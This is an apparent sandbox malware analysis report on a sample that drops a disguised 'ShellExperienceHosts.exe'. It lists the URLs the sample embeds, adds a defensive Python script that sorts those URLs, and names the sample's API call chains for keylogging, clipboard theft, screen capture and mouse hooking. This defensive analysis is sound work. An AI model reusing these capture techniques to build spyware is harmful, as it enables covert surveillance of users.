Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://dw-collect-debug.ksord.com)datesign_eventslocal
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://dw-online.ksosoft.com/api/dynamicParam/v3/app/2.9.0dcsdk_eventv3.dbdcsdk_dpv3.data10C
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://en.ksupdate.com/errorreport/uphttps://en.ksupdate.com/errorreport/up-crashdmp
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://event.4wps.nethttps://event.wps.comcountryCodeFinishTaghttps://www.google-analytics.com/mp/co
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://ic.wps.cn/wpsv6internet/infos.ads?v=D1S1E1&d=kdcsdk_infoc/wps/client/appcountrycodelastupdate
Source: powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.comodoca.com0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0L
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0N
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0#
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://clients2.google.com/service/update2/crxSoftware
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_db
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheF
Source: powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=&version=&chann
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevic
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: https://sectigo.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/distsrc/.execrashdmppidtidexp1IS_WPSO
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/package/SOFTWARE
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://website-prod.cache.wpscdn.com/pkgs/win/setup_XA_mui_Free.exeSOFTWARE
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: https://www.digicert.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.google-analytics.com/mp/collecthttps://http:///Iphlpapi.dllGetNetworkParamsinternal_proc
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/eula
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/eulaprivacy_policylicense_agreementlabelTitleMsg_Wps_OnlineSetup_TaskMsgMsg_Wps_
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/privacy-policy
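A caveat on the URL table above before treating any of it as network IOCs: the crl.*, ocsp.*, crt.* and CPS URLs come from the Authenticode signing and timestamping certificate chains embedded in the PE files (any signed binary carries them), the wps.com / ksosoft.com / ksord.com / wpscdn.com strings belong to the WPS Office online-setup installer the sample carries (the dropped wps_lid.lid-s8HDMqE8a6Xy.exe and the konlinesetup_xa.exe OriginalFilename seen further down), and the nuget.org / Pester / contoso.com / aka.ms strings are ordinary PowerShell module and help artefacts in the powershell.exe memory dumps. The characters glued to many URLs ("0y", "0#", ")datesign_eventslocal") are simply the bytes that followed the URL in memory, typically the DER length byte of the next certificate field. The script below is an added example, not part of the Joe Sandbox report: it parses the flattened rows, trims that trailing junk, and sorts the URLs into the buckets just described so an analyst can focus on whatever is left over. The sample rows are copied from the table above; the allowlists and the two-label "registered domain" shortcut are this example's own triage choices for this report, not a general-purpose list.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the "String found in binary or memory" table above.
REPORT_ROWS = [
    r"Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y",
    r"Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0#",
    r"Source: backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0",
    r"Source: powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe",
    r"Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester",
    r"Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/eula",
    r"Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://dw-collect-debug.ksord.com)datesign_eventslocal",
    r"Source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi#",
]

ROW_RE = re.compile(r"^Source: (?P<src>.+?)String found in binary or memory: (?P<raw>.+)$")
# The host must end in a letter so a DER length byte glued to it ("ocsp.sectigo.com0")
# is not swallowed; the path charset stops at the first byte that cannot be in a URL.
URL_RE = re.compile(r"(?P<scheme>https?://)(?P<host>[A-Za-z0-9.-]*[A-Za-z])(?P<path>/[A-Za-z0-9._~/%?=&+-]*)?")
PKI_EXT_RE = re.compile(r"(\.(?:crl|crt|cer|p7c))[^/]*$")

# Allowlists are this example's own triage choices for this report (assumption).
PKI_HOSTS = {
    "crl.comodoca.com", "ocsp.comodoca.com", "crl.sectigo.com", "crt.sectigo.com",
    "ocsp.sectigo.com", "sectigo.com", "crl3.digicert.com", "crl4.digicert.com",
    "ocsp.digicert.com", "www.digicert.com",
}
BUNDLED_INSTALLER = {"wps.com", "wps.cn", "wpscdn.com", "ksosoft.com", "ksord.com",
                     "ksupdate.com", "4wps.net", "google-analytics.com", "google.com", "curl.se"}
POWERSHELL_RUNTIME = {"nuget.org", "pesterbdd.com", "github.com", "contoso.com",
                      "aka.ms", "xmlsoap.org", "apache.org"}


def registered_domain(host: str) -> str:
    # Last two labels; good enough for the TLDs on this page (no co.uk-style suffixes).
    return ".".join(host.lower().split(".")[-2:])


def clean_url(raw: str):
    """Extract the URL and drop the bytes glued after a .crl/.crt/.cer/.p7c path."""
    m = URL_RE.search(raw)
    if not m:
        return None
    path = PKI_EXT_RE.sub(r"\1", m.group("path") or "")
    return m.group("scheme") + m.group("host") + path


def classify(host: str) -> str:
    h = host.lower()
    if h in PKI_HOSTS:
        return "pki"
    d = registered_domain(h)
    if d in BUNDLED_INSTALLER:
        return "bundled-installer"
    if d in POWERSHELL_RUNTIME:
        return "powershell-runtime"
    return "unclassified"  # fragments such as http://crl.mi land here for manual review


def triage(rows):
    by_category, by_source = defaultdict(set), defaultdict(set)
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        url = clean_url(m.group("raw"))
        if url is None:
            continue
        by_category[classify(URL_RE.search(url).group("host"))].add(url)
        # A memory-dump id (...sdmp) belongs to the process named just before it.
        for src in m.group("src").split(", "):
            if not src.endswith(".sdmp"):
                by_source[src].add(url)
    return {"by_category": dict(by_category), "by_source": dict(by_source)}


if __name__ == "__main__":
    for cat, urls in sorted(triage(REPORT_ROWS)["by_category"].items()):
        print(f"{cat}: {sorted(urls)}")
```

Anything that ends up in "unclassified" is the only part of this table worth a second look; for this report that is the truncated crl.mi / crl.micro fragments, which are themselves just partially overwritten Microsoft CRL URLs.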

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_0332BC70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F4DAC GetSystemMetrics,GetAsyncKeyState,WindowFromPoint,ScreenToClient,SendMessageW,ScreenToClient,3_2_6C6F4DAC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_0332E4F0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74C3CF GetKeyState,GetKeyState,GetKeyState,3_2_6C74C3CF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8E2D CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B43F ExitWindowsEx,3_2_0332B43F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B41B ExitWindowsEx,3_2_0332B41B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B463 ExitWindowsEx,3_2_0332B463
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326EE03_2_03326EE0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326C503_2_03326C50
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333E3413_2_0333E341
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033383813_2_03338381
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333EA1D3_2_0333EA1D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033289003_2_03328900
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333F9FF3_2_0333F9FF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333D89F3_2_0333D89F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333DDF03_2_0333DDF0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033224B03_2_033224B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8E2D3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6DA6CF3_2_6C6DA6CF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B87923_2_6C6B8792
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA1AE3_2_6C6BA1AE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D9B7B3_2_6C6D9B7B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6DB6543_2_6C6DB654
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BAD113_2_6C6BAD11
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BAE953_2_6C6BAE95
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C84CF403_2_6C84CF40
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C71483C3_2_6C71483C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6CC9CA3_2_6C6CC9CA
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C699E3_2_6C6C699E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C854B743_2_6C854B74
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F854C3_2_6C6F854C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C71250E3_2_6C71250E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7107B93_2_6C7107B9
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA1EE3_2_6C6BA1EE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7A01E53_2_6C7A01E5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA2653_2_6C6BA265
